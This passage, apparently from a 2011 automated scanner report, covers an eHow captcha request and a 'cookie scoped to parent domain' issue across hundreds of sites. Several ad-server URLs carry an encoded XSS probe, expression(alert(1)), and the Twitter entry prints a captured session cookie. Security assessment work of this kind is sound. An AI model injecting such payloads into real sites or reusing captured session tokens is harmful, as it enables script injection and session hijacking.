GET /forms/Support/DisplayCaptchaImage.aspx?t=QxgleDlJlMfntudZp4SN8w%3d%3d HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: https://www.ehow.com/forms/PasswordRetrieval.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:12:24 GMT
Content-Type: image/jpeg; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 4851

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQ=" />
...[SNIP]...

11. Cookie scoped to parent domain previous next
There are 508 instances of this issue:

http://dev.twitter.com/
http://m.twitter.com/
http://sorry.google.com/sorry/Captcha
http://www.bing.com/travel/
http://www.bing.com/travel/deals/airline-ticket-deals.do
http://www.cafemom.com/group/416
http://www.cafemom.com/group/46574
http://www.directstartv.com/
http://www.faneuilhallmarketplace.com/
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.mywot.com/en/scorecard/2mdn.net
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.pctools.com/free-antivirus/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.trw.com/
http://a.rad.msn.com/ADSAdClient31.dll
http://ad-emea.doubleclick.net/click
http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59
http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995
http://ad.doubleclick.net/adi/N3285.google/B2343920.91
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4
http://ad.doubleclick.net/adi/dmd.ehow/homepage
http://ad.doubleclick.net/adj/dmd.ehow/gen
http://ad.doubleclick.net/click
http://ad.doubleclick.net/clk
http://adclick.g.doubleclick.net/aclk
http://ads.adbrite.com/adserver/vdi/762701
http://ads.revsci.net/adserver/ako
https://adwords.google.com/select/Login
http://api.bizographics.com/v1/profile.json
http://b.scorecardresearch.com/b
http://blog.facebook.com/blog.php
http://blogsearch.google.com/blogsearch
http://books.google.com/
http://books.google.com/books
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://businessonmain.msn.com/browseresources/articles/firststeps.aspx
http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx
http://businessonmain.msn.com/questions/default.aspx
http://businessonmain.msn.com/videos/coolrunnings.aspx
http://c.chango.com/collector/tag.js
http://c.statcounter.com/t.php
http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy
http://code.google.com/apis/maps/terms.html
http://code.google.com/p/swfobject/
http://code.google.com/p/swfobject/wiki/documentation
https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js
http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp
http://cspix.media6degrees.com/orbserv/hbpix
http://deals.msn.com/
http://developer.yahoo.com/yui/compressor/
http://developers.facebook.com/plugins/
http://dm.demdex.net/pixel/10236
http://dpm.demdex.net/demdot.jpg
http://ds.addthis.com/red/psi/p.json
http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json
http://edge.quantserve.com/quant.js
http://editorial.autos.msn.com/articles/default.aspx
http://editorial.autos.msn.com/blogs/autosblog.aspx
http://editorial.autos.msn.com/media/default.aspx
http://editorial.autos.msn.com/media/video/default.aspx
http://editorial.autos.msn.com/new-cars/default.aspx
http://editorial.autos.msn.com/used-cars/default.aspx
http://entertainment.msn.com/
http://entertainment.msn.com/news/
http://entertainment.msn.com/video/
http://groups.google.com/groups
http://health.msn.com/
http://health.msn.com/health-topics/quit-smoking/articlepage.aspx
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/pv
http://i.simpli.fi/dpx.js
http://ib.adnxs.com/getuidu
http://ib.adnxs.com/px
http://id.google.com/verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif
http://id.google.com/verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif
http://id.google.com/verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif
http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif
http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif
http://id.google.com/verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif
http://id.google.com/verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif
http://id.google.com/verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif
http://image2.pubmatic.com/AdServer/Pug
http://images.google.com/images
http://info.yahoo.com/w3c/p3p.xml
http://js.revsci.net/gateway/gw.js
http://khm0.google.com/kh/v/x3d78/x26
http://khm1.google.com/kh/v/x3d78/x26
http://khmdb0.google.com/kh
http://khmdb1.google.com/kh
http://kona32.kontera.com/KonaGet.js
http://latino.msn.com/
http://lifestyle.msn.com/
http://lifestyle.msn.com/relationships/
http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx
http://lifestyle.msn.com/relationships/your-money-today/article.aspx
http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx
http://lifestyle.msn.com/your-look/
http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx
http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx
http://local.msn.com/
http://local.msn.com/hourly.aspx
http://local.msn.com/movies-events.aspx
http://local.msn.com/news.aspx
http://local.msn.com/restaurants.aspx
http://local.msn.com/sports.aspx
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
https://login.facebook.com/
https://login.facebook.com/ajax/intl/language_dialog.php
https://login.facebook.com/help/
https://login.facebook.com/login.php
https://login.facebook.com/r.php
https://maps-api-ssl.google.com/maps
http://media.fastclick.net/w/tre
http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239
http://movies.msn.com/
http://movies.msn.com/movies/article.aspx
http://movies.msn.com/new-on-dvd/movies/
http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/
http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/
http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/
http://movies.msn.com/showtimes/showtimes.aspx
http://movies.msn.com/the-rundown/the-guard/story_5/
http://mt2.google.com/mapstt
http://mt3.google.com/mapstt
http://music.msn.com/
http://music.msn.com/music/article.aspx
http://my.msn.com/
http://my.omniture.com/
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3
http://news.google.com/news/story
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902
https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0
http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://picasaweb.google.com/lh/view
https://picasaweb.google.com/lh/view
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js
http://pixel.facebook.com/ajax/register/logging.php
http://pixel.invitemedia.com/data_sync
http://pixel.mathtag.com/event/js
http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif
http://pixel.tree.com/api/image.ashx/collect
http://pixel.tree.com/pt.ashx
http://px.admonkey.dapper.net/PixelMonkey
http://r.casalemedia.com/j.gif
http://r.openx.net/set
http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/
http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/
http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc
http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588
http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://realestate.msn.com/
http://realestate.msn.com/slideshow.aspx
http://sales.liveperson.net/hc/15744040/
http://scholar.google.com/scholar
http://segment-pixel.invitemedia.com/set_partner_uid
http://segment-pixel.invitemedia.com/setuid
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://sitelife.ehow.com/ver1.0/Direct/Process
https://sitesearch.omniture.com/center/
http://social.entertainment.msn.com/bloglist.aspx
http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx
http://solutions.liveperson.com/ref/lppb.asp
http://sorry.google.com/sorry/
http://sorry.google.com/sorry/Captcha
http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx
http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx
http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx
http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx
http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx
http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx
http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx
http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx
http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx
http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx
http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx
http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx
http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx
http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx
http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx
http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx
http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx
http://specials.msn.com/IEIncreaseFont_preview.aspx
http://specials.msn.com/alphabet.aspx
http://sync.mathtag.com/sync/img
http://t.invitemedia.com/track_imp
http://tags.bluekai.com/site/1463
http://tags.bluekai.com/site/2748
http://track.roiservice.com/track/track.aspx
http://tracking.tree.com/trk/npv-event.gif
http://tracking.tree.com/trk/pv.gif
http://translate.google.com/translate_t
http://tv.msn.com/
http://tv.msn.com/last-night-on-tv/
http://tv.msn.com/tv/article.aspx
http://video.google.com/videosearch
http://vs.dmtracker.com/tags/vs.js
http://w.ic.tynt.com/b/o
http://www.bing.com/
http://www.bing.com/images/results.aspx
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/news/results.aspx
http://www.bing.com/news/search
http://www.bing.com/news/search
http://www.bing.com/results.aspx
http://www.bing.com/search
http://www.bing.com/shopping
http://www.bing.com/shopping/pet-beds/c/5533
http://www.bing.com/shopping/photo-storage-presentation/search
http://www.bing.com/shopping/search
http://www.bing.com/shopping/televisions/c/4724
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/shopping/womens-workout-clothing/r/146
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do
http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643
http://www.bing.com/travel/hotels
http://www.bing.com/videos/browse
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j
http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj
http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k
http://www.capitalone.com/creditcards/orbitz/index.php
http://www.cheaptickets.com/
http://www.demandstudios.com/ehow-writers.html
http://www.ehow.com/
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/MillenniumHotels
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/badges
http://www.facebook.com/btaylor
http://www.facebook.com/campaign/impression.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/careers/
http://www.facebook.com/developers
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/ligatt
http://www.facebook.com/mobile
http://www.facebook.com/omniture
http://www.facebook.com/orbitz
http://www.facebook.com/pages/blekko/316217594002
http://www.facebook.com/platform
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/recover.php
http://www.facebook.com/terms.php
https://www.facebook.com/
https://www.facebook.com/2008/fbml
https://www.facebook.com/login.php
http://www.google.com/finance
http://www.google.com/setprefs
http://www.msn.com/
http://www.omniture.com/de
http://www.omniture.com/en
http://www.omniture.com/en/
http://www.omniture.com/en/community
http://www.omniture.com/en/community/blogs
http://www.omniture.com/en/community/events
http://www.omniture.com/en/community/usergroups
http://www.omniture.com/en/company/adobe_faq
http://www.omniture.com/en/company/analyst_insight
http://www.omniture.com/en/company/customers
http://www.omniture.com/en/company/press_room
http://www.omniture.com/en/company/press_room/awards
http://www.omniture.com/en/company/press_room/news
http://www.omniture.com/en/company/press_room/press_releases
http://www.omniture.com/en/contact
http://www.omniture.com/en/contact/company
http://www.omniture.com/en/contact/email
http://www.omniture.com/en/contact/feedback
http://www.omniture.com/en/contact/offices
http://www.omniture.com/en/contact/sales
http://www.omniture.com/en/contact/support
http://www.omniture.com/en/education
http://www.omniture.com/en/education/academic_initiative
http://www.omniture.com/en/education/certification
http://www.omniture.com/en/education/certification/implementation
http://www.omniture.com/en/education/certification/insight_analyst
http://www.omniture.com/en/education/certification/insight_architect
http://www.omniture.com/en/education/certification/search_center
http://www.omniture.com/en/education/certification/site_catalyst
http://www.omniture.com/en/education/certification/support
http://www.omniture.com/en/education/certification/test_target
http://www.omniture.com/en/education/courses
http://www.omniture.com/en/education/courses/discover
http://www.omniture.com/en/education/courses/dop_analyst
http://www.omniture.com/en/education/courses/merchandising
http://www.omniture.com/en/education/courses/online_marketing_suite
http://www.omniture.com/en/education/courses/sbu
http://www.omniture.com/en/education/courses/searchcenter
http://www.omniture.com/en/education/courses/sitesearch
http://www.omniture.com/en/education/courses/survey
http://www.omniture.com/en/education/courses/testandtarget
http://www.omniture.com/en/partners
http://www.omniture.com/en/partners/apply
http://www.omniture.com/en/partners/portal
http://www.omniture.com/en/partners/showcase
http://www.omniture.com/en/privacy
http://www.omniture.com/en/privacy/2o7
http://www.omniture.com/en/privacy/policy
http://www.omniture.com/en/privacy/product
http://www.omniture.com/en/privacy/visualsciences
http://www.omniture.com/en/privacy/visualsciences/policy
http://www.omniture.com/en/privacy/visualsciences/resources
http://www.omniture.com/en/privacy/visualsciences/terms
http://www.omniture.com/en/product_tours/form
http://www.omniture.com/en/products/conversion
http://www.omniture.com/en/products/conversion/merchandising
http://www.omniture.com/en/products/conversion/publish
http://www.omniture.com/en/products/conversion/recommendations
http://www.omniture.com/en/products/conversion/searchandpromote
http://www.omniture.com/en/products/conversion/survey
http://www.omniture.com/en/products/conversion/testandtarget
http://www.omniture.com/en/products/conversion/testandtarget11
http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing
http://www.omniture.com/en/products/marketing_integration/genesis
http://www.omniture.com/en/products/marketing_integration/genesis/applications
http://www.omniture.com/en/products/multichannel_analytics
http://www.omniture.com/en/products/multichannel_analytics/insight
http://www.omniture.com/en/products/multichannel_analytics/insight_retail
http://www.omniture.com/en/products/online_analytics
http://www.omniture.com/en/products/online_analytics/digitalpulse
http://www.omniture.com/en/products/online_analytics/discover
http://www.omniture.com/en/products/online_analytics/sitecatalyst
http://www.omniture.com/en/products/online_business_optimization
http://www.omniture.com/en/products/online_marketing_suite
http://www.omniture.com/en/products/open_business_analytics_platform
http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse
http://www.omniture.com/en/products/tours
http://www.omniture.com/en/products/visitor_acquisition
http://www.omniture.com/en/products/visitor_acquisition/searchcenter
http://www.omniture.com/en/resources
http://www.omniture.com/en/resources/articles
http://www.omniture.com/en/resources/case_studies
http://www.omniture.com/en/resources/cmo.com
http://www.omniture.com/en/resources/guides
http://www.omniture.com/en/resources/testimonials
http://www.omniture.com/en/resources/webinars
http://www.omniture.com/en/services
http://www.omniture.com/en/services/consulting
http://www.omniture.com/en/services/es
http://www.omniture.com/en/survey/5084
http://www.omniture.com/en/surveys
http://www.omniture.com/es
http://www.omniture.com/fr
http://www.omniture.com/jp
http://www.omniture.com/ko
http://www.omniture.com/offer/100
http://www.omniture.com/offer/101
http://www.omniture.com/offer/102
http://www.omniture.com/offer/107
http://www.omniture.com/offer/108
http://www.omniture.com/offer/158
http://www.omniture.com/offer/162
http://www.omniture.com/offer/17
http://www.omniture.com/offer/170
http://www.omniture.com/offer/186
http://www.omniture.com/offer/187
http://www.omniture.com/offer/191
http://www.omniture.com/offer/285
http://www.omniture.com/offer/286
http://www.omniture.com/offer/291
http://www.omniture.com/offer/301
http://www.omniture.com/offer/303
http://www.omniture.com/offer/323
http://www.omniture.com/offer/331
http://www.omniture.com/offer/335
http://www.omniture.com/offer/337
http://www.omniture.com/offer/357
http://www.omniture.com/offer/372
http://www.omniture.com/offer/400
http://www.omniture.com/offer/411
http://www.omniture.com/offer/412
http://www.omniture.com/offer/413
http://www.omniture.com/offer/427
http://www.omniture.com/offer/429
http://www.omniture.com/offer/435
http://www.omniture.com/offer/462
http://www.omniture.com/offer/704
http://www.omniture.com/offer/892
http://www.omniture.com/offer/987
http://www.omniture.com/offer/989
http://www.omniture.com/press/867
http://www.omniture.com/press/868
http://www.omniture.com/zh
http://www.orbitz.com/
http://www.orbitz.com/App/DPTLandingPageSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/InitDealEdit
http://www.orbitz.com/App/PartnerTracking
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PrepareActivitiesHome
http://www.orbitz.com/App/PrepareDealsHome
http://www.orbitz.com/App/PrepareFlightsTab
http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp
http://www.orbitz.com/App/PrepareSearchResult
http://www.orbitz.com/App/PrepareVacationsHome
http://www.orbitz.com/App/Sitemap
http://www.orbitz.com/App/SubmitQuickSearch
http://www.orbitz.com/App/ViewDHTMLCalendar
http://www.orbitz.com/App/ViewHotelSearch
http://www.orbitz.com/App/ViewMyAccount
http://www.orbitz.com/App/ViewRSSHelpPage
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewTravelWatchHome
http://www.orbitz.com/hotels/
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/Secure/ViewSecureCalendar
https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile
http://www.parentsconnect.com/flux/login_sync.jhtml
http://www.parentsconnect.com/flux/widgetRedirect.jhtml
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.websitetoolbox.com/tool/view/mb/file
http://www.worldmastiffforum.com/
http://www.worldmastiffforum.com/file
http://www.youtube.com/user/sqlrtfm
http://xcdn.xgraph.net/15530/db/xg.gif

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. http://dev.twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dev.twitter.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCOQY0OctAToOcmV0dXJuX3RvIhxodHRwOi8v%250AZGV2LnR3aXR0ZXIuY29tLzoHaWQiJTgxNjZlZjA5Yjk3MDk3ZTkzNzY3NzNl%250AZTdlZjA3ZDE1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--3f74dffcbda83e02ede7f40fb1c9fbf484dea921; domain=.twitter.com; path=/
k=173.193.214.243.1296674330831255; path=/; expires=Wed, 09-Feb-11 19:18:50 GMT; domain=.twitter.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dev.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. http://m.twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://m.twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

